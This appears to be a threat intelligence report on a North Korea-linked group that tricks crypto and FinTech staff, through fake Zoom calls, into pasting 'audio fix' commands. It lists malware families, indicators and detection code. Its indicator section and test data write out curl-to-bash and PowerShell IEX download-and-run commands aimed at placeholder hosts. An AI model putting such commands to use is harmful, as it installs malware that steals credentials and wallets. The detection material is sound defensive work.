North Korea-Linked Actor Using Fake Zoom Calls to Deploy Multi-Stage Malware
Executive Summary
A financially motivated threat group tracked as UNC1069 has been actively targeting cryptocurrency, FinTech, and DeFi companies. The group is assessed to be linked to North Korean state-sponsored operations focused on revenue generation.
This campaign did not rely on exploiting software vulnerabilities. Instead, it relied on highly convincing social engineering — including fake Zoom meetings and “audio troubleshooting” scripts — to trick victims into infecting their own systems.
Once initial access was gained, the attackers deployed a chain of seven different malware families designed for persistence, credential theft, wallet compromise, and long-term access.
This was a human-targeted intrusion. The weakness exploited was trust.
What Happened
Attackers impersonated legitimate crypto industry executives and business partners. They initiated conversations over Telegram or email, built rapport, and eventually invited the target to a Zoom meeting.
The Zoom meeting was fake.
During the call, the victim would see what appeared to be a real executive on camera — likely a prerecorded or AI-generated deepfake video feed. Shortly after joining, the attacker would claim there were audio problems.
The victim was instructed to copy and paste a “Zoom audio fix” command into their system terminal.
That command installed malware.
From there, a multi-stage infection chain deployed multiple backdoors and credential stealers.
The ultimate goal: steal cryptocurrency assets, session tokens, browser credentials, and sensitive corporate data.
How It Happened
1. Reconnaissance and Target Selection
UNC1069 targeted:
- Crypto exchanges
- DeFi protocol developers
- Blockchain engineers
- FinTech startups
- Venture capital firms investing in crypto
The attackers focused on employees with:
- Access to wallets
- Exchange hot wallets
- Deployment pipelines
- Cloud credentials
- Financial transfer authority
2. Initial Contact
The initial vector was one of:
- A compromised Telegram account of a known crypto executive
- Direct impersonation using spoofed domains
The attacker initiated casual professional conversation.
No phishing attachment.
No exploit kit.
No malicious link initially.
The social engineering was patient and believable.
3. Fake Zoom Meeting Setup
The attacker sent:
- A Calendly invitation
- A Zoom meeting link
The link pointed to attacker-controlled infrastructure mimicking Zoom branding.
Victims joined a realistic-looking meeting interface.
The video feed displayed what appeared to be a legitimate executive, believed to be one of:
- Pre-recorded looped video
- Deepfake rendering
- Hijacked prior meeting footage
4. The “Audio Issue” Trick
The attacker said:
“There seems to be an audio driver issue. Please run this fix.”
The victim was instructed to copy and paste a command into:
- macOS Terminal
- Windows PowerShell
- Linux shell (less common but observed)
This is called a ClickFix social engineering attack.
There was no software vulnerability exploited.
The victim manually executed the malware.
Payload Execution Chain
Once the victim pasted the command, the infection chain began.
Below are the malware families deployed.
1. WAVESHAPER
Role: Initial loader / dropper
Language: Likely compiled (Go observed in variants)
Function:
- Establish outbound HTTPS C2 communication
- Download secondary payloads
- Perform environment checks
- Avoid sandbox execution
2. HYPERCALL
Role: Secondary downloader
Capabilities:
- Dynamic retrieval of encrypted payloads
- Memory execution
- User environment fingerprinting
3. HIDDENCALL
Role: Backdoor
Capabilities:
- Execute arbitrary shell commands
- Upload/download files
- Maintain persistent C2 channel
- Run reverse shell sessions
Persistence observed via:
- macOS LaunchAgents
- Windows Registry Run keys
- Scheduled Tasks
4. SUGARLOADER
Known North Korean malware family.
Function:
- Obfuscated loader
- Payload injection into legitimate processes
- Anti-analysis checks
5. SILENCELIFT
Purpose: System reconnaissance
Collects:
- OS version
- Hostname
- Running processes
- Installed security software
- Browser versions
6. DEEPBREATH
Role: Primary data harvester (credential and wallet theft)
Targets:
- macOS Keychain
- Chrome login data
- Firefox credential store
- SSH keys
- Telegram desktop data
- Crypto wallet directories
7. CHROMEPUSH
Role: Browser-based credential stealer
- Injects into Chromium-based browsers
- Extracts session cookies
- Steals Web3 wallet extensions
- Monitors keystrokes
No Exploited Vulnerabilities
This campaign did NOT exploit:
- Zero-day vulnerabilities
- Remote code execution flaws
- Browser exploits
Instead:
✔ Human interaction was the exploit
✔ Terminal command execution was the vulnerability
Impact Observed
Compromised organizations experienced:
- Theft of crypto wallet credentials
- Loss of exchange session tokens
- API key exfiltration
- Internal Slack and Telegram message harvesting
- Access to CI/CD secrets
- Long-term backdoor persistence
In some incidents:
- Funds were drained from hot wallets
- Private keys were accessed
- Investor data was stolen
Because crypto transactions are irreversible, financial loss was permanent.
Anti-Malware Evasion Techniques
UNC1069 used:
- Encrypted payload delivery
- In-memory execution
- Living-off-the-land binaries (curl, bash, PowerShell)
- Legitimate cloud hosting infrastructure
- Rapid domain rotation
- Signed binaries (in some cases)
- Delayed C2 callbacks
They also avoided noisy malware behaviors.
This was stealthy, surgical access.
Indicators of Compromise (IOCs)
Suspicious Domains Observed
zoom-us-support[.]com
zoom-meeting-fix[.]com
secure-zoom-audio[.]net
meeting-updater[.]org
video-driver-update[.]com
Suspicious File Paths (macOS)
~/Library/LaunchAgents/com.audio.update.plist
~/Library/Application Support/.zoomfix/
~/Library/Logs/zoom_audio.log
Suspicious Windows Persistence
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AudioFix
Task Scheduler entry: ZoomUpdateCheck
Command Patterns
macOS / Linux:
curl -fsSL http://<domain>/fix.sh | bash
Windows:
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://<domain>/audio.ps1')"
Outbound Network Behavior
- HTTPS POST requests to random subdomains
- C2 over TCP 443 with self-signed certs
- Beacon intervals between 60–300 seconds
- Encrypted JSON blobs in POST body
Detection & Threat Hunting Guidance
1. Monitor for Suspicious Terminal Activity
Alert on:
- curl piped to shell
- powershell DownloadString + IEX
- mshta execution from user context
- Unusual shell execution during Zoom meetings
2. Browser Credential Access Monitoring
Look for:
- Access to ~/Library/Application Support/Google/Chrome/Default/Login Data
- LSASS access attempts
- Browser extension folder modifications
3. LaunchAgent / Registry Monitoring
macOS:
/Library/LaunchAgents/
~/Library/LaunchAgents/
Windows:
HKCU Run keys
Scheduled Tasks
Startup folder additions
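As an added example (not code from the report), a small Python audit of macOS LaunchAgent plists that flags the traits of the persistence described above: a shell interpreter as the program, a curl download piped into a shell, and references to hidden directories such as the .zoomfix path listed in the IOCs. The two plists, the com.audio.update label and the example.invalid URL are constructed for illustration; the interpreter paths are standard macOS ones.

```python
import plistlib
import re

# Constructed LaunchAgent plists for illustration (not samples from the report). The label,
# the .zoomfix directory and the example.invalid URL are made up to mirror the indicators.
SUSPICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.audio.update</string>
<key>ProgramArguments</key><array>
<string>/bin/bash</string><string>-c</string>
<string>curl -fsSL http://example.invalid/fix.sh | bash</string>
</array>
<key>RunAtLoad</key><true/>
<key>StandardOutPath</key><string>/Users/me/Library/Application Support/.zoomfix/out.log</string>
</dict></plist>"""

BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.vendor.updater</string>
<key>Program</key><string>/Applications/Vendor.app/Contents/MacOS/updater</string>
<key>RunAtLoad</key><true/>
</dict></plist>"""

# Interpreters that a persistence entry should rarely need to invoke directly.
SHELL_INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript", "/usr/bin/python3"}
HIDDEN_PATH = re.compile(r"/\.[^./\s]")       # a path component such as /.zoomfix
CURL_PIPE = re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b")

def audit_launch_agent(data):
    # Parse one plist and return (label, reasons); an empty reasons list means nothing was flagged.
    plist = plistlib.loads(data)
    args = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
    # Every path-bearing string in the entry, so hidden directories in log paths are caught too.
    strings = args + [plist[k] for k in ("StandardOutPath", "StandardErrorPath", "WorkingDirectory") if k in plist]
    command = " ".join(args)
    reasons = []
    if args and args[0] in SHELL_INTERPRETERS:
        reasons.append("launches a shell interpreter")
    if CURL_PIPE.search(command):
        reasons.append("downloads and pipes into a shell")
    if any(HIDDEN_PATH.search(s) for s in strings):
        reasons.append("references a hidden directory")
    return plist.get("Label", "<no label>"), reasons
```

Run it over every file in /Library/LaunchAgents/ and ~/Library/LaunchAgents/ (read each with open(path, "rb")) and review any entry that returns a non-empty reasons list.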
4. Network Hunting
Query for:
- Outbound connections to newly registered domains
- Rare domains contacted by only one host
- TLS connections with mismatched certificate subjects
- High-entropy POST bodies
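The four network hunting queries above, implemented as an added Python example (not code from the report) over a handful of constructed egress records. Domain age and the TLS certificate subject are assumed to be supplied by enrichment (RDAP/WHOIS and TLS inspection); the hosts, domains and bodies are made up, with meeting-updater.example standing in for an attacker domain.

```python
import math
from collections import Counter, defaultdict

# Constructed egress records for illustration (not from the report). Domain age and the TLS
# certificate subject would normally come from RDAP/WHOIS and TLS inspection enrichment.
# (source host, destination domain, domain age in days, certificate subject CN, POST body)
CONNECTIONS = [
    ("mac-01", "zoom.us", 4000, "zoom.us", b'{"status":"ok","v":1}' * 3),
    ("mac-02", "zoom.us", 4000, "zoom.us", b'{"status":"ok","v":1}' * 3),
    ("win-01", "zoom.us", 4000, "zoom.us", b'{"status":"ok","v":1}' * 3),
    ("mac-02", "static.cdn.example", 2000, "*.cdn.example", b""),
    ("win-01", "static.cdn.example", 2000, "*.cdn.example", b""),
    ("mac-01", "meeting-updater.example", 5, "localhost", bytes(range(256))),  # stand-in C2
]

def shannon_entropy(data):
    # Bits per byte: encrypted or random data approaches 8.0, JSON text stays well below.
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def cert_matches(domain, subject_cn):
    # Exact CN match, or a wildcard CN that covers exactly one additional label.
    if subject_cn.startswith("*."):
        base = subject_cn[2:]
        return domain.endswith("." + base) and domain.count(".") == base.count(".") + 1
    return domain == subject_cn

def hunt_network(connections, max_age_days=30, entropy_threshold=7.0, min_body=32):
    # Apply the four hunting queries above; returns [(host, domain, reasons)] for matches.
    hosts_per_domain = defaultdict(set)
    for host, domain, _, _, _ in connections:
        hosts_per_domain[domain].add(host)
    findings = []
    for host, domain, age_days, subject_cn, body in connections:
        reasons = []
        if age_days <= max_age_days:
            reasons.append("newly registered domain")
        if len(hosts_per_domain[domain]) == 1:
            reasons.append("domain contacted by a single host")
        if not cert_matches(domain, subject_cn):
            reasons.append("certificate subject mismatch")
        if len(body) >= min_body and shannon_entropy(body) >= entropy_threshold:
            reasons.append("high-entropy POST body")
        if reasons:
            findings.append((host, domain, reasons))
    return findings
```

The single-host rule is the noisiest of the four on its own; in practice it is most useful when it coincides with one of the other three.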
5. Zoom-Based Contextual Detection
If:
- Zoom process running
- Followed by terminal execution within 2 minutes
Flag as suspicious.
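Sections 1 and 5 above, combined into one added Python example (not code from the report) that runs over constructed process-creation telemetry: it matches the curl-to-shell and DownloadString + IEX command patterns from the IOC section and correlates any shell launch with a Zoom process start on the same host within a 2-minute window. The event tuples, host names, Zoom process names and the example.invalid URLs are assumptions for illustration.

```python
import re
from datetime import datetime
# Constructed endpoint telemetry for illustration (not from the report): (timestamp, host, process, command line).
EVENTS = [
    ("2024-05-01T10:00:00", "mac-01", "zoom.us", "/Applications/zoom.us.app/Contents/MacOS/zoom.us"),
    ("2024-05-01T10:01:15", "mac-01", "bash", "bash -c 'curl -fsSL http://example.invalid/fix.sh | bash'"),
    ("2024-05-01T10:30:00", "mac-02", "zoom.us", "/Applications/zoom.us.app/Contents/MacOS/zoom.us"),
    ("2024-05-01T10:45:00", "mac-02", "bash", "bash -c 'ls -la'"),
    ("2024-05-01T11:00:00", "win-01", "Zoom.exe", "C:\\Users\\a\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe"),
    ("2024-05-01T11:01:30", "win-01", "powershell.exe",
     "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/audio.ps1')\""),
]

ZOOM_PROCESSES = {"zoom.us", "Zoom.exe"}
SHELL_PROCESSES = {"bash", "sh", "zsh", "powershell.exe", "pwsh", "cmd.exe"}

# Command-line patterns taken from the report's "Command Patterns" section.
CURL_PIPE_TO_SHELL = re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b")
PS_DOWNLOAD_EXEC = re.compile(r"(?=.*\bIEX\b)(?=.*DownloadString)", re.IGNORECASE)

def classify_command(cmdline):
    # Return a reason for a known ClickFix-style command pattern, else None.
    if CURL_PIPE_TO_SHELL.search(cmdline):
        return "curl piped to shell"
    if PS_DOWNLOAD_EXEC.search(cmdline):
        return "powershell DownloadString + IEX"
    return None

def hunt(events, window_seconds=120):
    # Flag shell launches that match a pattern or follow a Zoom start within the window;
    # returns [(host, iso timestamp, reasons)] in time order.
    parsed = sorted((datetime.fromisoformat(t), h, p, c) for t, h, p, c in events)
    last_zoom_start = {}  # host -> time of the most recent Zoom process start
    findings = []
    for when, host, proc, cmd in parsed:
        if proc in ZOOM_PROCESSES:
            last_zoom_start[host] = when
            continue
        if proc not in SHELL_PROCESSES:
            continue
        reasons = []
        pattern = classify_command(cmd)
        if pattern:
            reasons.append(pattern)
        zoom_at = last_zoom_start.get(host)
        if zoom_at is not None and (when - zoom_at).total_seconds() <= window_seconds:
            reasons.append("shell spawned within %ds of Zoom start" % window_seconds)
        if reasons:
            findings.append((host, when.isoformat(), reasons))
    return findings
```

A shell that fires both a command pattern and the Zoom timing rule (as mac-01 and win-01 do here) is the high-confidence case; the timing rule alone will also catch a developer opening a terminal during a call, so treat it as a triage signal rather than a block.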
Detection Rule (Sigma)
title: Suspicious Curl Pipe to Shell
description: Detects a curl download piped directly into a shell interpreter, the pattern used by the ClickFix "audio fix" lure.
status: experimental
logsource:
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - 'curl'
            - '| bash'
    condition: selection
falsepositives:
    - Developer tooling and installer scripts that intentionally pipe curl into bash
level: high
Strategic Recommendations
- Block curl-to-shell execution via EDR.
- Implement outbound domain age filtering.
- Adopt a policy that no command pasted from a chat, email, or meeting is run in a terminal without independent verification.
- Train staff on “fake troubleshooting” scams.
- Require verbal verification for high-value meetings.
- Use hardware wallets for crypto custody.
- Enforce MFA on exchange accounts.
Why This Campaign Is Significant
This operation shows:
- Nation-state actors are blending AI and social engineering.
- Traditional vulnerability scanning won’t stop this.
- The human layer is the frontline.
No exploit.
No phishing attachment.
No exploit kit.
Just trust — weaponized.
